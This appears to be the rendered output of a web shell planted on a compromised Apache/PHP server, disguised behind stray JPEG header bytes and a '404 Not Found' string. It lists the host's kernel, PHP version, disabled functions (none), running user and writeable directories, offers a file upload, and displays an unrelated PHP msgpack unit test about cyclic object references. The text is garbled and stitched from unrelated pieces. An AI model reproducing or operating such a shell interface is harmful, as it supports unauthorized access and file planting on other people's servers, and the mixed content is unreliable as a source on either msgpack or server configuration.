����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /usr/share/tests/pecl/msgpack/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //usr/share/tests/pecl/msgpack/tests/033.phpt
--TEST--
Object test, cyclic references
--SKIPIF--
--FILE--
<?php
if(!extension_loaded('msgpack')) {
    dl('msgpack.' . PHP_SHLIB_SUFFIX);
}

class Foo {
    public $parent;
    public $children;

    public function __construct() {
        $this->parent = null;
        $this->children = array();
    }

    public function addChild(Foo $obj) {
        $this->children[] = $obj;
        $obj->setParent($this);
    }

    public function setParent(Foo $obj) {
        $this->parent = $obj;
    }
}

$obj1 = new Foo();

for ($i = 0; $i < 10; $i++) {
    $obj = new Foo();
    $obj1->addChild($obj);
}

$o = msgpack_unserialize(msgpack_serialize($obj1->children));

foreach ($obj1->children as $k => $v) {
    $obj_v = $v;
    $o_v = $o[$k];

    echo gettype($obj_v), "  ", gettype($o_v), PHP_EOL;
}
?>
--EXPECT--
object  object
object  object
object  object
object  object
object  object
object  object
object  object
object  object
object  object
object  object

ZeroDay Forums Mini